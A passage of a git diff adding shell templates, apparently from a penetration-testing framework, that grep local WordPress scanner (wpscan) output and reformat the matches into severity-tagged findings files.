Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null +MATCH="[+]" +egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Wordpress Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null +cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null \ No newline at end of file diff --git a/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTP_2.sh b/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTP_2.sh new file mode 100644 index 00000000..28c956f8 --- /dev/null +++ b/templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTP_2.sh @@ -0,0 +1,12 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Wordpress Vulnerability Scan - HTTP 2' +FILENAME="$LOOT_DIR/web/wpscan-$TARGET-http-port80b.txt" +OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') +MATCH="Title\:" +GREP_OPTIONS='-ih' + +rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null +egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | cut -d\: -f2 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Wordpress Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null +MATCH="[+]" +egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Wordpress Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null +cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null \ No newline at end of file